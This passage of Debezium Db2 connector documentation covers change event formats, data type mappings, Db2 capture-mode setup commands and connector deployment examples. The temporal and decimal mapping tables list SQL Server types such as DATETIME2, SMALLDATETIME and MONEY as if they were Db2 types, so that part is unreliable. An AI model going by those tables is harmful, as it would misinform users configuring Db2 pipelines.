Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. 
In this example, note that the `EMAIL` value is `john.doe@example.org`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.org`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. 
In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. 
This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so {prodname} cannot perform CDC on those tables. Consider using a different type.\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nHow temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n
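For example, the following connector configuration fragment (a minimal sketch that shows only the relevant entry of a registration request) pins the default mode explicitly:\n\n[source,json]\n----\n{\n \"config\": {\n \"time.precision.mode\": \"adaptive\"\n }\n}\n----\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. 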
[[db2-temporal-types]]
=== Temporal types

How temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:

* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]
* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]

[[db2-time-precision-mode-adaptive]]
.`time.precision.mode=adaptive`
When the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.

.Mappings when `time.precision.mode` is `adaptive`
[cols="25%a,20%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`io.debezium.time.Date` +
 +
Represents the number of days since the epoch.

|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`
|`INT32`
|`io.debezium.time.Time` +
 +
Represents the number of milliseconds past midnight, and does not include timezone information.

|`TIME(4)`, `TIME(5)`, `TIME(6)`
|`INT64`
|`io.debezium.time.MicroTime` +
 +
Represents the number of microseconds past midnight, and does not include timezone information.

|`TIME(7)`
|`INT64`
|`io.debezium.time.NanoTime` +
 +
Represents the number of nanoseconds past midnight, and does not include timezone information.

|`DATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`
|`INT64`
|`io.debezium.time.MicroTimestamp` +
 +
Represents the number of microseconds since the epoch, and does not include timezone information.

|`DATETIME2(7)`
|`INT64`
|`io.debezium.time.NanoTimestamp` +
 +
Represents the number of nanoseconds since the epoch, and does not include timezone information.
|===

[[db2-time-precision-mode-connect]]
.`time.precision.mode=connect`
When the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, because Db2 supports a precision of one tenth of a microsecond, the events generated by a connector with the `connect` time precision mode *result in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.

.Mappings when `time.precision.mode` is `connect`
[cols="25%a,20%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`org.apache.kafka.connect.data.Date` +
 +
Represents the number of days since the epoch.

|`TIME([P])`
|`INT64`
|`org.apache.kafka.connect.data.Time` +
 +
Represents the number of milliseconds since midnight, and does not include timezone information. Db2 allows `P` to be in the range 0-7, to store up to a tenth of a microsecond of precision, though this mode results in a loss of precision when `P` is greater than 3.
|`DATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7, to store up to a tenth of a microsecond of precision, though this mode results in a loss of precision when `P` is greater than 3.
|===

[[db2-timestamp-types]]
=== Timestamp types

The `DATETIME`, `SMALLDATETIME`, and `DATETIME2` types represent a timestamp without time zone information.
Such columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value "2018-06-20 15:13:16.945104" is represented by an `io.debezium.time.MicroTimestamp` with the value "1529507596945104".

The timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.

[[db2-decimal-types]]
=== Decimal types

.Mappings for Db2 decimal types
[cols="27%a,18%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`NUMERIC[(P[,S])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`DECIMAL[(P[,S])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`SMALLMONEY`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`MONEY`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.
|===
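
For example, a `DECIMAL(10,2)` column might surface in the event schema as a `BYTES` field that carries the two schema parameters described in the preceding table. A minimal sketch, with a hypothetical `unit_price` field name:

[source,json]
----
{
  "type": "bytes",
  "optional": false,
  "name": "org.apache.kafka.connect.data.Decimal",
  "version": 1,
  "parameters": {
    "scale": "2",
    "connect.decimal.precision": "10"
  },
  "field": "unit_price"
}
----

The field value itself is the unscaled integer value encoded as a big-endian two's-complement byte array; consumers combine it with the `scale` parameter to reconstruct the decimal.
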
// Type: procedure
// ModuleID: setting-up-db2-to-run-a-debezium-connector
// Title: Setting up Db2 to run a {prodname} connector
[[setting-up-db2]]
== Set up

A database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.

This procedure assumes that you are logged in as the `db2inst1` user, which is the default instance and user name when using the Db2 Docker container image.

.Prerequisites

* On the machine on which Db2 is running, the content in `debezium-connector-db2/src/test/docker/db2-cdc-docker` is available in the `$HOME/asncdctools/src` directory.

.Procedure

. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`
command provided with Db2:
+
[source,shell]
----
cd $HOME/asncdctools/src
----
+
[source,shell]
----
./bldrtn asncdc
----

. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.
+
[source,shell]
----
db2 start db DB_NAME
----

. Ensure that JDBC can read the Db2 metadata catalog:
+
[source,shell]
----
cd $HOME/sqllib/bnd
----
+
[source,shell]
----
db2 bind db2schema.bnd blocking all grant public sqlerror continue
----

. Ensure that the database was recently backed up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `/dev/null` for the backup location.

.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:
+
[source,shell]
----
db2 backup db DB_NAME to BACK_UP_LOCATION
----

.. Restart the database:
+
[source,shell]
----
db2 restart db DB_NAME
----

. Connect to the database to install the {prodname} management UDFs. This step assumes that you are logged in as the `db2inst1` user, so the UDFs are installed under the `db2inst1` user:
+
[source,shell]
----
db2 connect to DB_NAME
----

. Copy the {prodname} management UDFs and set permissions for them:
+
[source,shell]
----
cp $HOME/asncdctools/src/asncdc $HOME/sqllib/function
----
+
[source,shell]
----
chmod 777 $HOME/sqllib/function
----

. Enable the {prodname} UDF that starts and stops the ASN capture agent:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdc_UDF.sql
----

. Create the ASN control tables:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdctables.sql
----

. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdcaddremove.sql
----
+
After you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them. For other UDFs, use the SQL `CALL` statement.

. Start the ASN agent:
+
[source,sql]
----
VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');
----

. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture mode. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:
+
[source,sql]
----
CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');
----
. Reinitialize the ASN service:
+
[source,sql]
----
VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');
----

.Additional resource

{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]

// Type: concept
// ModuleID: how-the-db2-capture-agent-configuration
=== How the Db2 capture agent configuration affects latency, server load, and performance

When a database administrator enables change data capture for a source table, the capture agent begins to run.
The agent reads new change event records from the transaction log and replicates the event records to a capture table.
Between the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.
This latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Kafka.

Ideally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and capture tables.
You might imagine that running the capture agent to continuously process change events as rapidly as possible might result in increased throughput and reduced latency --
populating change tables with new event records as soon as possible after the events occur, in near real time.
However, this is not necessarily the case.
There is a performance penalty to pay in the pursuit of more immediate synchronization.
Each time that the change agent queries the database for new event records, it increases the CPU load on the database host.
The additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.

It is important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.
If you notice performance problems, there are Db2 capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.

.Capture agent tuning parameters
On Db2, the `IBMSNAP_CAPPARMS` table contains parameters that control the operations of the capture agent.
Should you experience performance issues on Db2, you can configure the capture process by adjusting the values for these parameters.
Specifying the exact values to set for these parameters is beyond the scope of this documentation.

There are multiple capture agent parameters in the `IBMSNAP_CAPPARMS` table.
The following parameters are the most significant for modifying capture agent behavior for use with the {prodname} Db2 connector.

`COMMIT_INTERVAL`:: Specifies the number of seconds that the capture agent waits to commit data to the change data tables.
A lower value results in the change table receiving a greater number of commits in a shorter time period (lower latency).
Specifying a larger commit interval results in batch processing of the replication workload.

`SLEEP_INTERVAL`:: Specifies the number of seconds that the capture agent waits to start a new commit cycle after it reaches the end of the active transaction log.
Higher values reduce the number of commit cycles.

.Additional resources
* For more information about capture agent parameters, see the documentation for your Db2 database.
// Type: assembly
// ModuleID: deploying-debezium-db2-connectors
// Title: Deploying {prodname} Db2 connectors
[[db2-deploying-a-connector]]
== Deployment

ifdef::community[]

With https://zookeeper.apache.org[Zookeeper], http://kafka.apache.org/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:

. Download the link:https://repo1.maven.org/maven2/io/debezium/debezium-connector-db2/{debezium-version}/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].

. Extract the JAR files into your Kafka Connect environment.
. Add the directory with the JAR files to {link-kafka-docs}/#connectconfigs[Kafka Connect's `plugin.path`].
. Obtain the link:https://www.ibm.com/support/pages/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].
. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.
. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]
. Restart your Kafka Connect process to pick up the new JAR files.

If you are working with immutable containers, see link:https://hub.docker.com/r/debezium/[{prodname}'s container images] for Zookeeper, Kafka, and Kafka Connect with the Db2 connector already installed and ready to run.
You can also xref:operations/openshift.adoc[run {prodname} on Kubernetes and OpenShift].
endif::community[]

ifdef::product[]
To deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:

* xref:steps-for-installing-debezium-db2-connectors[]
* xref:debezium-db2-connector-configuration-example[]
* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]
* xref:descriptions-of-debezium-db2-connector-configuration-properties[]

// Type: concept
[id="steps-for-installing-debezium-db2-connectors"]
=== Steps for installing {prodname} Db2 connectors

To install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:

. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change data for tables that are in capture mode.

. Use link:https://access.redhat.com/products/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.

. Download the {prodname} link:https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].

. Extract the files into your Kafka Connect environment.
. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:
+
[source]
----
plugin.path=/kafka/connect
----
+
The above example assumes that you extracted the {prodname} Db2 connector to the `/kafka/connect/debezium-connector-db2` path.
. Restart your Kafka Connect process to ensure that the new JAR files are picked up.

endif::product[]

// Type: concept
// ModuleID: debezium-db2-connector-configuration-example
// Title: {prodname} Db2 connector configuration example
[[db2-example-configuration]]
=== Connector configuration example

ifdef::community[]

[[db2-example]]

Following is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.

You can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.

[source,json]
----
{
    "name": "db2-connector", // <1>
    "config": {
        "connector.class": "io.debezium.connector.db2.Db2Connector", // <2>
        "database.hostname": "192.168.99.100", // <3>
        "database.port": "50000", // <4>
        "database.user": "db2inst1", // <5>
        "database.password": "Password!", // <6>
        "database.dbname": "mydatabase", // <7>
        "database.server.name": "fulfillment", // <8>
        "table.include.list": "MYSCHEMA.CUSTOMERS", // <9>
        "database.history.kafka.bootstrap.servers": "kafka:9092", // <10>
        "database.history.kafka.topic": "dbhistory.fulfillment" // <11>
    }
}
----
<1> The name of the connector when registered with a Kafka Connect service.
<2> The name of this Db2 connector class.
<3> The address of the Db2 instance.
<4> The port number of the Db2 instance.
<5> The name of the Db2 user.
<6> The password for the Db2 user.
<7> The name of the database to capture changes from.
<8> The logical name of the Db2 instance/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro converter] is used.
<9> A list of all tables whose changes {prodname} should capture.
<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.
<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.
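
For example, to mask or truncate sensitive columns before their values reach Kafka, you might extend the `config` object with the column-filtering properties that are described in the connector properties reference later in this section. This is a sketch only; the schema, table, and column names are hypothetical:

[source,json]
----
{
    "column.exclude.list": "MYSCHEMA.CUSTOMERS.SSN",
    "column.mask.with.12.chars": "MYSCHEMA.CUSTOMERS.CREDIT_CARD",
    "column.truncate.to.20.chars": "MYSCHEMA.CUSTOMERS.NOTES"
}
----
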
endif::community[]

ifdef::product[]

Following is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.

You can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.

[source,yaml,options="nowrap",subs="+attributes"]
----
apiVersion: {KafkaConnectApiVersion}
kind: KafkaConnector
metadata:
  name: inventory-connector // <1>
  labels:
    strimzi.io/cluster: my-connect-cluster
spec:
  class: io.debezium.connector.db2.Db2Connector
  tasksMax: 1 // <2>
  config: // <3>
    database.hostname: 192.168.99.100 // <4>
    database.port: 50000
    database.user: db2inst1
    database.password: Password!
    database.dbname: mydatabase
    database.server.name: fulfillment // <5>
    database.include.list: public.inventory // <6>
----

.Descriptions of connector configuration settings
[cols="1,7",options="header",subs="+attributes"]
|===
|Item |Description

|1
|The name of the connector.

|2
|Only one task should operate at any one time.

|3
|The connector’s configuration.

|4
|The database host, which is the address of the Db2 instance.

|5
|The logical name of the Db2 instance/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro converter] is used.

|6
|Changes in only the `public.inventory` database are captured.

|===

endif::product[]

See the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.

You can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.

// Type: procedure
// ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect
// Title: Adding {prodname} Db2 connector configuration to Kafka Connect
[[db2-adding-connector-configuration]]
=== Adding connector configuration

ifdef::community[]
To start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster.

.Prerequisites

* {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change data for tables that are in capture mode.

* The Db2 connector is installed.

.Procedure

. Create a configuration for the Db2 connector.

. Use the link:{link-kafka-docs}/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.

endif::community[]

ifdef::product[]
You can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.

.Prerequisites

* Podman or Docker is installed and you have sufficient rights to create and manage containers.
* You installed the {prodname} Db2 connector archive.

.Procedure

. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:
+
[subs=+macros]
----
pass:quotes[*tree ./my-plugins/*]
./my-plugins/
├── debezium-connector-db2
│   ├── ...
----
. Create and publish a custom image for running your {prodname} connector:

.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:
+
[subs="+macros,+attributes"]
----
FROM {DockerKafkaConnect}
USER root:root
pass:quotes[COPY _./my-plugins/_ /opt/kafka/plugins/]
USER 1001
----
+
Before Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `/opt/kafka/plugins` directory.

.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:
+
`podman build -t debezium-container-for-db2:latest .`

.. Push your custom image to your container registry, for example:
+
`podman push debezium-container-for-db2:latest`

.. Point to the new container image. Do one of the following:
+
* Edit the `spec.image` property of the `KafkaConnect` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:
+
[source,yaml,subs="+attributes"]
----
apiVersion: {KafkaConnectApiVersion}
kind: KafkaConnect
metadata:
  name: my-connect-cluster
spec:
  #...
  image: debezium-container-for-db2
----
+
* In the `install/cluster-operator/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file, you must apply it to your OpenShift cluster.

. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].

. Apply the connector instance, for example:
+
